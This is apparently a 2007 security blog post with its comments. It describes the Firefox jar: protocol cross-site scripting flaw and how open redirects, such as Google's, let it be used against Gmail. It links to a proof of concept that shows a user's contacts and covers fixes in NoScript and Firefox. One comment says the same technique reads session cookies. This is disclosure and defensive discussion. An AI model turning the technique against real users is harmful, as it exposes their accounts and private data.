Firefox jar: Protocol Vulnerability

I just came across pdp's finding jar protocol vulnerability on Mozilla Firefox, I think its a big issue, and the fact that it has been on bugzilla (#369814) for way more than ten fuck*ng days is not a good thing.

According to pdp, this issue makes vulnerable to Cross-site scripting applications that allow users uploading compressed ZIP, and JAR files. After a couple of minutes messing around the poc's, I figured out that sites with open redirect issues are vulnerable too. I've created this poc that attacks Gmail, it's based on my previous post and it will only show your contacts list, it's not being logged server side or anything (as some people thought that my previous poc did. Credit to tx for discovering the open redirect issue used to exploit Google / Firefox):

http://beford.org/stuff/jarjarbinks.htm

Who's fault? Both, Google for having open redirect issues and not fixing them, and Mozilla Corporation for failing to address this problem.

What can I do to protect myself? Giorgio Maone have already added protection against this flaw to NoScript development version.

Update: NoScript released stable version with Jar protection. A new bugzilla (#403331) entry was created to fix the inappropiate redirect on jar protocol, according to the lastest comments and bug keyword, there seems to be a patch and will be availible with Firefox 2.0.0.10.

2007
11/10
CATEGORY
English
Security
XSS
TAGS






7 comments
    • pdp
    • November 10th, 2007

    impressive, nice find!

  2. Boom! That’s a bombshell and a half….Nice find.

    Though its probably worth explaining (to people who don’t want to run the PoC) that the actual issue here that makes open redirects such an issue is that the jar: protocol following redirects, but doesn’t actually change the domain.

    So all redirects are vulnerable if you can get them to point to any zip file.

  3. I just checked and redirects which use the Refresh header rather than the Location header seem to be immune.

    • Nicolas
    • November 12th, 2007

    s/languaje/language/ on jarjarbinks.htm.

  5. Nicolas: Thanks, fixed.

  6. i could not manipulate cookies.
    it only affects csrf ?

  7. Luca: You should be able to read cookies, I didn’t try too hard but my first test with Gmail was a simple alert(document.cookies) and It worked.